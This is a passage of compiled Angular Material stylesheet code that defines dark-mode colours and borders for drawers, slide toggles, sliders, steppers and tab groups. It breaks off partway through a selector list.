.darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(255,255,255,.12);border-right:none}.darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#bdbdbd99}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked)   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#bdbdbd}.darkMode[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.darkMode[_ngcontent-%COMP%]   .mat-slider[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.cdk-focused[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing)   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d;background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-slider-has-ticks[_ngcontent-%COMP%]   .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-slider-horizontal[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%]   .mat-slider-vertical[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(255,255,255,.7),rgba(255,255,255,.7) 2px,transparent 0,transparent)}.darkMode[_ngcontent-%COMP%]   .mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#ffffff0a}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-optional[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{background-color:#ffffffb3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-stepper-horizontal[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .darkMode[_ngcontent-%COMP%]   .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-sort-header-arrow[_ngcontent-%COMP%]{color:#c6c6c6}.darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(255,255,255,.12);border-bottom:none}.darkMode[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   